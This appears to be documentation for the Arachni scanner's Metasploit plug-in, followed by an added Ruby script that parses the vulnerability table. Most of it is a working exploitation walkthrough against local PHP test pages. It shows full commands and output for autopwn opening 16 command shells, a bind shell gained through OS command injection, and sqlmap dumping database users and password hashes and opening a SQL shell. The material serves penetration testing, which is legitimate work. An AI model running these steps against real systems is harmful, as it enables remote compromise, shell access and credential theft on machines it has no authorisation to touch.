# WebApp exploitation with Arachni and Metasploit

Arachni provides advanced exploitation techniques via the:

- ArachniMetareport, an Arachni report specifically designed to provide WebApp context to the [Metasploit](http://www.metasploit.com/) framework.
- Arachni plug-in for the [Metasploit](http://www.metasploit.com/) framework, used to load the ArachniMetareport in order to provide advanced automated and manual exploitation of WebApp vulnerabilities.
- Advanced generic WebApp exploit modules for the [Metasploit](http://www.metasploit.com/) framework, utilized either manually or automatically by the Arachni MSF plug-in.

Please be warned that, at the moment, the Metasploit integration is a proof of concept and is neither officially supported nor a high priority.

## Installation

To install the necessary files, copy the contents of the `external/metasploit` directory to Metasploit's root:

```
$ cp -R arachni/external/metasploit/* metasploit/
```

## Usage

### Creating the Metareport

#### New scan

```
$ ./arachni.rb http://localhost/~zapotek/tests/ --report=metareport:outfile=localhost.afr.msf
Arachni - Web Application Security Scanner Framework v0.2.1 [0.1.9]
   Author: Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>
           (With the support of the community and the Arachni Team.)
   Website:       http://github.com/Arachni/arachni
   Documentation: http://github.com/Arachni/arachni/wiki

 [~] No modules were specified.
 [~]    -> Will run all mods.

 [~] No audit options were specified.
 [~]    -> Will audit links, forms and cookies.

[...snipping a whole lot of scan output...]

 [*] Creating file for the Metasploit framework...
 [*] Saved in 'localhost.afr.msf'.
 [*] Dumping audit results in 'metareport.afr'.
 [*] Done!
```

#### Converting an existing report

To convert a standard Arachni Framework Report (`.afr`) file to a Metareport (`.afr.msf`) file:

```
$ ./arachni.rb --repload=localhost.afr --report=metareport:outfile=localhost.afr.msf
Arachni - Web Application Security Scanner Framework v0.2.1 [0.1.9]
   Author: Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>
           (With the support of the community and the Arachni Team.)
   Website:       http://github.com/Arachni/arachni
   Documentation: http://github.com/Arachni/arachni/wiki

 [*] Creating file for the Metasploit framework...
 [*] Saved in 'localhost.afr.msf'.
```

### Using the Arachni plug-in via Metasploit

#### Loading the ArachniMetareport

```
$ ./msfconsole    # Start the MSF

[...MSF banner...]

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 620 exploits - 307 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r10844 updated today (2010.10.29)

msf > load arachni    # Load the Arachni plug-in
[*] Successfully loaded plugin: arachni

msf > arachni_load ../arachni/localhost.afr.msf    # Load the ArachniMetareport using the Arachni plug-in
[*] Loading report...
[*] Loaded 19 vulnerabilities.

Unique exploits
===============

ID  Exploit                          Description
--  -------                          -----------
1   unix/webapp/arachni_php_include  This module allows complex HTTP requests to be crafted in order to allow
                                     exploitation of PHP remote file inclusion vulnerabilities. Use 'XXinjectionXX'
                                     to mark the value of the vulnerable variable/field, i.e. where the payload
                                     should go. Supported vectors: GET, POST, COOKIE, HEADER. (Mainly for use with
                                     the Arachni plug-in.)
2   unix/webapp/arachni_exec         This module allows complex HTTP requests to be crafted in order to allow
                                     exploitation of command injection vulnerabilities in Unix-like platforms. Use
                                     'XXinjectionXX' to mark the value of the vulnerable variable/field, i.e. where
                                     the payload should go. Supported vectors: GET, POST, COOKIE, HEADER. (Mainly
                                     for use with the Arachni plug-in.)
3   unix/webapp/arachni_php_eval     This module allows complex HTTP requests to be crafted in order to allow
                                     exploitation of PHP eval() vulnerabilities in Unix-like platforms. Use
                                     'XXinjectionXX' to mark the value of the vulnerable variable/field, i.e. where
                                     the payload should go. Supported vectors: GET, POST, COOKIE, HEADER. (Mainly
                                     for use with the Arachni plug-in.)
4   unix/webapp/arachni_sqlmap       This module is designed to be used with the Arachni plug-in. From the original:
                                     This module launches an sqlmap session. sqlmap is an automatic SQL injection
                                     tool developed in Python. Its goal is to detect and take advantage of SQL
                                     injection vulnerabilities on web applications. Once it detects one or more SQL
                                     injections on the target host, the user can choose among a variety of options
                                     to perform an extensive back-end database management system fingerprint,
                                     retrieve DBMS session user and database, enumerate users, password hashes,
                                     privileges, databases, dump entire or user specific DBMS tables/columns, run
                                     his own SQL SELECT statement, read specific files on the file system and much
                                     more.

Vulnerabilities
===============

ID  Host       Path                                    Name                   Method  Params                                 Exploit
--  ----       ----                                    ----                   ------  ------                                 -------
1   127.0.0.1  /~zapotek/tests/trainer.php             Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX\x00"}           unix/webapp/arachni_php_include
2   127.0.0.1  /~zapotek/tests/trainer.php             Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX"}               unix/webapp/arachni_php_include
3   127.0.0.1  /~zapotek/tests/cookies/os_command.php  OS command injection   COOKIE  {"os_command"=>"XXinjectionXX\x00"}    unix/webapp/arachni_exec
4   127.0.0.1  /~zapotek/tests/cookies/os_command.php  OS command injection   COOKIE  {"os_command"=>"XXinjectionXX"}        unix/webapp/arachni_exec
5   127.0.0.1  /~zapotek/tests/cookies/rfi.php         Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX\x00"}           unix/webapp/arachni_php_include
6   127.0.0.1  /~zapotek/tests/cookies/rfi.php         Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX"}               unix/webapp/arachni_php_include
7   127.0.0.1  /~zapotek/tests/cookies/eval.php        Code injection         COOKIE  {"eval"=>"%3BXXinjectionXX"}           unix/webapp/arachni_php_eval
8   127.0.0.1  /~zapotek/tests/forms/eval.php          Code injection         POST    {"eval"=>";XXinjectionXX"}             unix/webapp/arachni_php_eval
9   127.0.0.1  /~zapotek/tests/forms/os_command.php    OS command injection   POST    {"os_command"=>"XXinjectionXX\x00"}    unix/webapp/arachni_exec
10  127.0.0.1  /~zapotek/tests/forms/os_command.php    OS command injection   POST    {"os_command"=>"XXinjectionXX"}        unix/webapp/arachni_exec
11  127.0.0.1  /~zapotek/tests/forms/rfi.php           Remote file inclusion  POST    {"rfi"=>"XXinjectionXX\x00"}           unix/webapp/arachni_php_include
12  127.0.0.1  /~zapotek/tests/forms/rfi.php           Remote file inclusion  POST    {"rfi"=>"XXinjectionXX"}               unix/webapp/arachni_php_include
13  127.0.0.1  /~zapotek/tests/forms/sqli.php          SQL Injection          POST    {"sql_inj"=>"1"}                       unix/webapp/arachni_sqlmap
14  127.0.0.1  /~zapotek/tests/links/os_command.php    OS command injection   GET     {"os_command"=>"XXinjectionXX\x00"}    unix/webapp/arachni_exec
15  127.0.0.1  /~zapotek/tests/links/os_command.php    OS command injection   GET     {"os_command"=>"XXinjectionXX"}        unix/webapp/arachni_exec
16  127.0.0.1  /~zapotek/tests/links/rfi.php           Remote file inclusion  GET     {"rfi"=>"XXinjectionXX\x00"}           unix/webapp/arachni_php_include
17  127.0.0.1  /~zapotek/tests/links/rfi.php           Remote file inclusion  GET     {"rfi"=>"XXinjectionXX"}               unix/webapp/arachni_php_include
18  127.0.0.1  /~zapotek/tests/links/eval.php          Code injection         GET     {"eval"=>";XXinjectionXX"}             unix/webapp/arachni_php_eval
19  127.0.0.1  /~zapotek/tests/links/sqli.php          Blind SQL Injection    GET     {"id"=>"1"}                            unix/webapp/arachni_sqlmap

[*] Done!
msf >
```

#### Automated exploitation (arachni_autopwn)

##### Usage

```
msf > arachni_autopwn
[*] Usage: arachni_autopwn [options]
    -h          Display this help text
    -x [regexp] Only run modules whose name matches the regex
    -a          Launch exploits against all matched targets
    -r          Use a reverse connect shell
    -b          Use a bind shell on a random port (default)
    -m          Use a meterpreter shell (if possible)
    -q          Disable exploit module output
```

##### Example

```
msf > arachni_autopwn -a
[*] Running pwn-jobs...

[...snip...]

[*] Command shell session 1 opened (127.0.0.1:54598 -> 127.0.0.1:5019) at 2010-10-28 18:26:00 +0100
[*] Command shell session 2 opened (127.0.0.1:55336 -> 127.0.0.1:8541) at 2010-10-28 18:26:00 +0100
[*] Command shell session 3 opened (127.0.0.1:37880 -> 127.0.0.1:12465) at 2010-10-28 18:26:00 +0100
[*] Command shell session 4 opened (127.0.0.1:49451 -> 127.0.0.1:10866) at 2010-10-28 18:26:00 +0100
[*] Command shell session 5 opened (127.0.0.1:40276 -> 127.0.0.1:11915) at 2010-10-28 18:26:00 +0100
[*] Command shell session 6 opened (127.0.0.1:34400 -> 127.0.0.1:5222) at 2010-10-28 18:26:00 +0100
[*] Command shell session 7 opened (127.0.0.1:58456 -> 127.0.0.1:10955) at 2010-10-28 18:26:00 +0100
[*] Command shell session 9 opened (127.0.0.1:48549 -> 127.0.0.1:5929) at 2010-10-28 18:26:00 +0100
[*] Command shell session 8 opened (127.0.0.1:47028 -> 127.0.0.1:12432) at 2010-10-28 18:26:00 +0100
[*] Command shell session 10 opened (127.0.0.1:38239 -> 127.0.0.1:11919) at 2010-10-28 18:26:00 +0100
[*] Command shell session 11 opened (127.0.0.1:58541 -> 127.0.0.1:14343) at 2010-10-28 18:26:01 +0100
[*] Command shell session 12 opened (127.0.0.1:48655 -> 127.0.0.1:13743) at 2010-10-28 18:26:01 +0100
[*] Command shell session 13 opened (127.0.0.1:59996 -> 127.0.0.1:8895) at 2010-10-28 18:26:01 +0100
[*] Command shell session 14 opened (127.0.0.1:53717 -> 127.0.0.1:10767) at 2010-10-28 18:26:01 +0100
[*] Command shell session 15 opened (127.0.0.1:51623 -> 127.0.0.1:7668) at 2010-10-28 18:26:01 +0100
[*] Command shell session 16 opened (127.0.0.1:47874 -> 127.0.0.1:8965) at 2010-10-28 18:26:02 +0100

[...snip...]

[*] The autopwn command has completed with 16 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

  Id  Type   Information  Connection                       Via
  --  ----   -----------  ----------                       ---
  1   shell               127.0.0.1:54598 -> 127.0.0.1:5019   exploit/unix/webapp/arachni_php_eval
  2   shell               127.0.0.1:55336 -> 127.0.0.1:8541   exploit/unix/webapp/arachni_exec
  3   shell               127.0.0.1:37880 -> 127.0.0.1:12465  exploit/unix/webapp/arachni_exec
  4   shell               127.0.0.1:49451 -> 127.0.0.1:10866  exploit/unix/webapp/arachni_php_include
  5   shell               127.0.0.1:40276 -> 127.0.0.1:11915  exploit/unix/webapp/arachni_php_eval
  6   shell               127.0.0.1:34400 -> 127.0.0.1:5222   exploit/unix/webapp/arachni_exec
  7   shell               127.0.0.1:58456 -> 127.0.0.1:10955  exploit/unix/webapp/arachni_php_include
  8   shell               127.0.0.1:47028 -> 127.0.0.1:12432  exploit/unix/webapp/arachni_exec
  9   shell               127.0.0.1:48549 -> 127.0.0.1:5929   exploit/unix/webapp/arachni_exec
  10  shell               127.0.0.1:38239 -> 127.0.0.1:11919  exploit/unix/webapp/arachni_exec
  11  shell               127.0.0.1:58541 -> 127.0.0.1:14343  exploit/unix/webapp/arachni_php_include
  12  shell               127.0.0.1:48655 -> 127.0.0.1:13743  exploit/unix/webapp/arachni_php_include
  13  shell               127.0.0.1:59996 -> 127.0.0.1:8895   exploit/unix/webapp/arachni_php_include
  14  shell               127.0.0.1:53717 -> 127.0.0.1:10767  exploit/unix/webapp/arachni_php_include
  15  shell               127.0.0.1:51623 -> 127.0.0.1:7668   exploit/unix/webapp/arachni_php_eval
  16  shell               127.0.0.1:47874 -> 127.0.0.1:8965   exploit/unix/webapp/arachni_php_include

[*] ================================================================================

msf > sessions -i 1
[*] Starting interaction with 1...

ls
eval.php
os_command.php
rfi.php
sqli.php
xss.php
whoami
www-data
^C
Abort session 1? [y/N]  y

[*] Command shell session 1 closed.  Reason: User exit
msf >
```

Notice that we ended up with 16 sessions out of the 19 reported vulnerabilities. This is due to the fact that the `unix/webapp/arachni_sqlmap` exploit can't be launched automatically and because some of the reported vulnerabilities are basically the same.

Next we'll see how to use the `arachni_manual` command for assisted exploitation and get an SQL shell.

#### Assisted exploitation (arachni_manual)

```
msf > arachni_list_vulns    # Let's take a look at the available vulnerabilities once again.

Vulnerabilities
===============

ID  Host       Path                                    Name                   Method  Params                                 Exploit
--  ----       ----                                    ----                   ------  ------                                 -------
1   127.0.0.1  /~zapotek/tests/trainer.php             Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX\x00"}           unix/webapp/arachni_php_include
2   127.0.0.1  /~zapotek/tests/trainer.php             Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX"}               unix/webapp/arachni_php_include
3   127.0.0.1  /~zapotek/tests/cookies/os_command.php  OS command injection   COOKIE  {"os_command"=>"XXinjectionXX\x00"}    unix/webapp/arachni_exec
4   127.0.0.1  /~zapotek/tests/cookies/os_command.php  OS command injection   COOKIE  {"os_command"=>"XXinjectionXX"}        unix/webapp/arachni_exec
5   127.0.0.1  /~zapotek/tests/cookies/rfi.php         Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX\x00"}           unix/webapp/arachni_php_include
6   127.0.0.1  /~zapotek/tests/cookies/rfi.php         Remote file inclusion  COOKIE  {"rfi"=>"XXinjectionXX"}               unix/webapp/arachni_php_include
7   127.0.0.1  /~zapotek/tests/cookies/eval.php        Code injection         COOKIE  {"eval"=>"%3BXXinjectionXX"}           unix/webapp/arachni_php_eval
8   127.0.0.1  /~zapotek/tests/forms/eval.php          Code injection         POST    {"eval"=>";XXinjectionXX"}             unix/webapp/arachni_php_eval
9   127.0.0.1  /~zapotek/tests/forms/os_command.php    OS command injection   POST    {"os_command"=>"XXinjectionXX\x00"}    unix/webapp/arachni_exec
10  127.0.0.1  /~zapotek/tests/forms/os_command.php    OS command injection   POST    {"os_command"=>"XXinjectionXX"}        unix/webapp/arachni_exec
11  127.0.0.1  /~zapotek/tests/forms/rfi.php           Remote file inclusion  POST    {"rfi"=>"XXinjectionXX\x00"}           unix/webapp/arachni_php_include
12  127.0.0.1  /~zapotek/tests/forms/rfi.php           Remote file inclusion  POST    {"rfi"=>"XXinjectionXX"}               unix/webapp/arachni_php_include
13  127.0.0.1  /~zapotek/tests/forms/sqli.php          SQL Injection          POST    {"sql_inj"=>"1"}                       unix/webapp/arachni_sqlmap
14  127.0.0.1  /~zapotek/tests/links/os_command.php    OS command injection   GET     {"os_command"=>"XXinjectionXX\x00"}    unix/webapp/arachni_exec
15  127.0.0.1  /~zapotek/tests/links/os_command.php    OS command injection   GET     {"os_command"=>"XXinjectionXX"}        unix/webapp/arachni_exec
16  127.0.0.1  /~zapotek/tests/links/rfi.php           Remote file inclusion  GET     {"rfi"=>"XXinjectionXX\x00"}           unix/webapp/arachni_php_include
17  127.0.0.1  /~zapotek/tests/links/rfi.php           Remote file inclusion  GET     {"rfi"=>"XXinjectionXX"}               unix/webapp/arachni_php_include
18  127.0.0.1  /~zapotek/tests/links/eval.php          Code injection         GET     {"eval"=>";XXinjectionXX"}             unix/webapp/arachni_php_eval
19  127.0.0.1  /~zapotek/tests/links/sqli.php          Blind SQL Injection    GET     {"id"=>"1"}                            unix/webapp/arachni_sqlmap

msf > arachni_manual 19    # The vulnerability with ID '19' uses the 'unix/webapp/arachni_sqlmap' module
[*] Using unix/webapp/arachni_sqlmap .
[*] Preparing datastore for 'Blind SQL Injection' vulnerability @ 127.0.0.1/~zapotek/tests/links/sqli.php ...
SRVHOST => 127.0.0.1
SRVPORT => 7872
RHOST => 127.0.0.1
RPORT => 80
LHOST => 127.0.0.1
LPORT => 12633
SSL => false
GET => id=1
METHOD => GET
COOKIES =>
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/0.2.1
PATH => /~zapotek/tests/links/sqli.php
[*] Done!

Compatible payloads
===================

   Name  Description
   ----  -----------

Use: set PAYLOAD <name>

msf auxiliary(arachni_sqlmap) > show options    # Make sure that everything is set up properly

Module options:

   Name         Current Setting                                             Required  Description
   ----         ---------------                                             --------  -----------
   COOKIES                                                                  no
   GET          id=1                                                        no        HTTP GET query
   METHOD       GET                                                         yes       HTTP Method
   OPTS         --users --time-test --passwords --dbs --sql-shell -v 0      no        The sqlmap options to use
   PATH         /~zapotek/tests/links/sqli.php                              yes       The path to test for SQL injection
   POST                                                                     no        The data string to be sent through POST
   Proxies                                                                  no        Use a proxy chain
   RHOST        127.0.0.1                                                   yes       The target address
   RPORT        80                                                          yes       The target port
   SQLMAP_PATH  sqlmap                                                      yes       The sqlmap >= 0.8 full path
   VHOST                                                                    no        HTTP server virtual host

msf auxiliary(arachni_sqlmap) > set SQLMAP_PATH /home/zapotek/Downloads/sqlmap/sqlmap.py    # Tell the module where the sqlmap script is
SQLMAP_PATH => /home/zapotek/Downloads/sqlmap/sqlmap.py

msf auxiliary(arachni_sqlmap) > exploit    # rock it!
[*] exec: /home/zapotek/Downloads/sqlmap/sqlmap.py -u 'http://127.0.0.1:80//~zapotek/tests/links/sqli.php?id=1' --method GET --users --time-test --passwords --dbs --sql-shell -v 0 --cookie ''

    sqlmap/0.8 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 15:08:25

[15:08:26] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
time based blind sql injection payload: 'id=1%27%20AND%20SLEEP%285%29%20AND%20%27HXME%27=%27HXME'
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'zonster'

database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *7AD474111CBF8492D9311D6E8493490ED6247D86
[*] phpmyadmin [1]:
    password hash: *C3A70F18627A18967A3A70C0F648CDEE0BCE9AB2
[*] root [1]:
    password hash: NULL

available databases [5]:
[*] arachni
[*] information_schema
[*] msf
[*] mysql
[*] phpmyadmin

sql-shell> CURRENT_USER()    # And we now have an SQL shell to play with!
do you want to retrieve the SQL statement output? [Y/n]
CURRENT_USER():    'root@localhost'
sql-shell> VERSION()
do you want to retrieve the SQL statement output? [Y/n]
VERSION():    '5.1.49-1ubuntu8'
sql-shell> q

[*] shutting down at: 15:09:07

[*] Auxiliary module execution completed
msf auxiliary(arachni_sqlmap) >
```

Of course, `arachni_manual` is not limited to any one module. For example:

```
msf auxiliary(arachni_sqlmap) > arachni_manual 15    # Prepare the vulnerability with ID '15'
[*] Using unix/webapp/arachni_exec .
[*] Preparing datastore for 'OS command injection' vulnerability @ 127.0.0.1/~zapotek/tests/links/os_command.php ...
SRVHOST => 127.0.0.1
SRVPORT => 9033
RHOST => 127.0.0.1
RPORT => 80
LHOST => 127.0.0.1
LPORT => 11853
SSL => false
GET => os_command=XXinjectionXX
METHOD => GET
COOKIES =>
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/0.2.1
PATH => /~zapotek/tests/links/os_command.php
[*] Done!
PAYLOAD => cmd/unix/bind_perl

msf exploit(arachni_exec) > exploit    # rock it!
[*] Sending HTTP request for /~zapotek/tests/links/os_command.php
[*] Started bind handler
[*] Command shell session 17 opened (127.0.0.1:45295 -> 127.0.0.1:11853) at 2010-10-29 15:13:48 +0100

# And we now have a system shell!
ls
eval.php
os_command.php
redirect.php
rfi.php
sqli.php
xss.php
whoami
www-data
^C
Abort session 17? [y/N]  y

[*] Command shell session 17 closed.  Reason: User exit
msf exploit(arachni_exec) >
```
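Returning to the autopwn run above, which produced 16 sessions from 19 reported vulnerabilities: the following Ruby script is an added example, not code from Arachni or its Metasploit plug-in. It parses a constructed subset of the `arachni_load` vulnerability table, sets aside the `arachni_sqlmap` entries that autopwn cannot launch, and collapses the null-byte variants into unique injection points, so the session count can be estimated during triage before anything is launched.

```ruby
# Added example, not code from Arachni or its Metasploit plug-in: parse the
# "Vulnerabilities" table printed by arachni_load and reduce it to unique
# injection points, which explains why autopwn yields fewer sessions than
# the table has rows.

# Constructed subset of the table above. The single-quoted heredoc keeps
# '\x00' as a literal escape, exactly as the plug-in prints it.
SAMPLE_TABLE = <<~'TABLE'
  1 127.0.0.1 /~zapotek/tests/trainer.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
  2 127.0.0.1 /~zapotek/tests/trainer.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
  3 127.0.0.1 /~zapotek/tests/cookies/os_command.php OS command injection COOKIE {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
  4 127.0.0.1 /~zapotek/tests/cookies/os_command.php OS command injection COOKIE {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
  13 127.0.0.1 /~zapotek/tests/forms/sqli.php SQL Injection POST {"sql_inj"=>"1"} unix/webapp/arachni_sqlmap
  18 127.0.0.1 /~zapotek/tests/links/eval.php Code injection GET {"eval"=>";XXinjectionXX"} unix/webapp/arachni_php_eval
  19 127.0.0.1 /~zapotek/tests/links/sqli.php Blind SQL Injection GET {"id"=>"1"} unix/webapp/arachni_sqlmap
TABLE

# One row: ID, host, path, free-text name, vector, params hash, exploit module.
ROW = /\A(\d+)\s+(\S+)\s+(\S+)\s+(.+?)\s+(GET|POST|COOKIE|HEADER)\s+(\{.*\})\s+(\S+)\z/

# The page states this module cannot be launched by arachni_autopwn.
MANUAL_ONLY = ['unix/webapp/arachni_sqlmap'].freeze

def parse_vulns(table)
  table.each_line.map(&:strip).reject(&:empty?).map do |line|
    next unless (m = ROW.match(line))
    {
      id: m[1].to_i, host: m[2], path: m[3], name: m[4], method: m[5],
      param: m[6][/\{"([^"]+)"=>/, 1],
      null_byte: m[6].include?('\x00'), # null-byte-terminated twin of the same entry
      exploit: m[7]
    }
  end.compact
end

def triage(vulns)
  auto = vulns.reject { |v| MANUAL_ONLY.include?(v[:exploit]) }
  # Rows differing only by the trailing null byte reach the same code path,
  # so group them by host, path, vector and parameter name.
  points = auto.group_by { |v| v.values_at(:host, :path, :method, :param) }
  {
    reported: vulns.size,
    manual_only: vulns.size - auto.size,
    unique_points: points.size,
    null_byte_variants: points.values.count { |vs| vs.size > 1 && vs.any? { |v| v[:null_byte] } }
  }
end

p triage(parse_vulns(SAMPLE_TABLE)) if __FILE__ == $PROGRAM_NAME
```

For the seven sample rows this reports 2 entries that need `arachni_manual`, and the remaining 5 collapse to 3 unique injection points, 2 of which were listed twice because of the null-byte variant.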